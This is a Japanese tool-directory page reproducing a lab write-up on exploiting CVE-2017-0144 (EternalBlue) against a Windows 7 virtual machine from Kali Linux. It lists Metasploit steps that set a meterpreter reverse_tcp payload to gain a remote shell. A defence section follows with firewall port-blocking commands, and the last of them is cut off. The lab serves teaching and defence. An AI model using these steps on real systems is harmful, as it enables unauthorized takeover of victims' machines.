Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Vulnerability-Research-CVE-2017-0144 — LAB: SMBプロトコルの脆弱性を利用したWindows OSへの攻撃 | Kitploit
ツール/GitHubGitHub/ducanh2oo3/vulnerability-research-cve-2017-0144
エクスプロイトフレームワーク脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubducanh2oo3/vulnerability-research-cve-2017-0144

Vulnerability-Research-CVE-2017-0144

LAB: SMBプロトコルの脆弱性を利用したWindows OSへの攻撃

リポジトリを見る
92年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Vulnerability-Research-CVE-2017-0144

LAB: SMBプロトコルの脆弱性を利用したWindows OSへの攻撃 mohinh

  • I. 説明
    このラボでは、2台のコンピュータを使用して、Windows OSのSMBプロトコルの脆弱性を利用した攻撃をシミュレートします。1台はKali Linux OSを搭載しており、攻撃者(ハッカー)の役割を果たします。もう1台は被害者マシン(victim)の役割を果たします。被害者マシンは、SMBの脆弱性を含むWindows 7 64ビットOSを実行しています。これを実現するために、Kali Linuxマシン上でEternalBlueというエクスプロイトコードを使用して、Windows 7マシンを攻撃します。
  • II. 概要
  • Server Message Block(SMB)は、MicrosoftのWindowsプラットフォームで非常に一般的なファイル共有プロトコルです。このSMBプロトコルにより、同じネットワーク層または同じドメイン内のWindowsコンピュータ同士がファイルを共有できます。現在では、SMBはCommon Internet File Sharing(CIFS)とも呼ばれています。
  • EternalBlueは、ポート445を介したSMBプロトコルの脆弱性を利用した情報搾取コードです。当初、EternalBlueは米国国家安全保障局(NSA)によって開発されました。英語での正式名称はU.S. National Security Agencyです。しかしその後、2017年にハッカーグループThe Shadow Brokersによって流出しました。同年、世界中でMicrosoftのWindowsを搭載したコンピュータを標的とした、ランサムウェア(身代金要求型ウイルス)による大規模な攻撃が発生しました。その中でも最も有名なのはWannaCryウイルスです。現在までに、この脆弱性はMicrosoftによってセキュリティ更新プログラムMS17-010で修正されています。しかし、世界中の多くのWindows OSを実行しているコンピュータには、依然としてこの脆弱性が存在しています。この脆弱性はCVE-2017-0144(Windows SMB Remote Code Execution Vulnerability)として公開されています。この脆弱性は非常に危険であり、簡単に悪用される可能性があります。特筆すべきは、このSMBプロトコルの脆弱性を介して攻撃するために、ハッカーは被害者に悪意のあるウイルスをダウンロードさせたり実行させたりする必要がないことです。つまり、被害者は何もしなくても、ハッカーに簡単にコンピュータを乗っ取られ、知らないうちに制御されてしまう可能性があるのです。
  • III. 準備
  • VMware Workstation上で動作する2台の仮想マシンを用意します。Kali Linux仮想マシン(ハッカーマシン)のIPアドレスは192.168.198.140、Windows 7仮想マシン(被害者マシン)のIPアドレスは192.168.198.143です。 mohinh2 1.Kali仮想マシン(攻撃側):
  • -IPアドレスの確認: ifconfig
  • -PostgreSQLサービスの起動: # service postgresql start
  • -PostgreSQLが起動しているか確認: # service postgresql status 2.Windows 7仮想マシン(被害者側):
  • IPアドレスの確認: ipconfig
  • ファイアウォールを無効化する。
  • IV. 攻撃の実行
  • Kaliマシン上で、以下のコマンドでMetasploitにログイン: # msfconsole
  • image
  • Metasploitに入ったら、ms17_010に関連するエクスプロイトや構文を検索: # search ms17_010
  • image
  • 被害者マシンと攻撃マシンのIPアドレスを設定
  • ペイロードを設定してエクスプロイト:
  • use 0 -> set payload windows/x64/meterpreter/reverse_tcp:
  • エクスプロイトを実行して攻撃を開始
  • image
  • -侵入後、被害者マシン上でシェルを開く(攻撃マシンのターミナル経由で実行): image
  • =>ここまでで、ハッカーは被害者マシンへの侵入に成功したと見なせます。この時点で、ハッカーは被害者に気付かれることなくファイルを削除したり盗んだりできます。さらに、ハッカーはそこにウイルスをアップロードして直接実行することも可能です。
  • V. 防御方法
  • – SMBプロトコルの悪用を避けるために、以下の対策を実施する必要があります:
  • ファイアウォールを有効にする。
  • Windowsを最新バージョンにアップデートする。または、Microsoftのセキュリティ修正プログラムをダウンロードして適用する。特にMS17_010のセキュリティ修正プログラム。
  • ポート135、445をブロックする。
  • +netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
  • +netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 nam
  • ツールをダウンロード